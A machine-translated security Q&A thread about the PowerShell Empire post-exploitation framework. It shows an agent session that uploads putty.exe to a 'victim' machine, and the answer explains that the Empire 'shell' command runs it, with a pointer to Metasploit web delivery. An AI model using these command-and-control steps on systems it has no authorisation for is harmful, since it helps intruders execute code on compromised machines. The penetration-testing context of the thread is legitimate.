Imperio probando los comandos de PowerShell

Question

Imperio probando los comandos de PowerShell

#1 de Carter Brainerd (1 votos)

4

Estoy probando Empire Powershell.

Me preguntaba cómo puede ejecutar un archivo de forma remota después de subirlo a la máquina de la víctima.

(Empire: ANHGP22NCFLPVAAH) > cd Desktop
(Empire: ANHGP22NCFLPVAAH) > 
Path                   
----                   
C:\Users\Testpc\Desktop
(Empire: ANHGP22NCFLPVAAH) > upload /root/Testpc/putty.exe
(Empire: ANHGP22NCFLPVAAH) > cd Desktop
(Empire: ANHGP22NCFLPVAAH) > 
Path                   
----                   
C:\Users\Testpc\Desktop
(Empire: ANHGP22NCFLPVAAH) > dir
(Empire: ANHGP22NCFLPVAAH) > 
LastWriteTime      Length Name                                       
-------------      ------ ----                                       
11-1-2017 23:27:49    282 desktop.ini                                
20-2-2017 0:50:37  531368 putty.exe 
(Empire: ANHGP22NCFLPVAAH) > (what are the commands to remotly execute the putty.exe file)

penetration-test powershell

pregunta alien187 20.02.2017 - 02:09

fuente

1 respuesta

Lea otras preguntas en las etiquetas penetration-test powershell

¿Qué datos se filtran cuando se crea un apk de Android? Intercambio de claves WPA2 Enterprise EAP-TLS

score 1 · Answer 1

Puedes usar el comando shell .

Desde la pantalla de ayuda:

shell: le pide a un agente que use un comando de shell.

En su caso, ejecutar putty.exe sería así:

(Empire: Win10Priv) > shell <pathtoputty>\putty.exe

También puedes hacer esto para ejecutar los comandos de entrega web Metasploit, de una forma más sencilla si migras de Empire a Msf.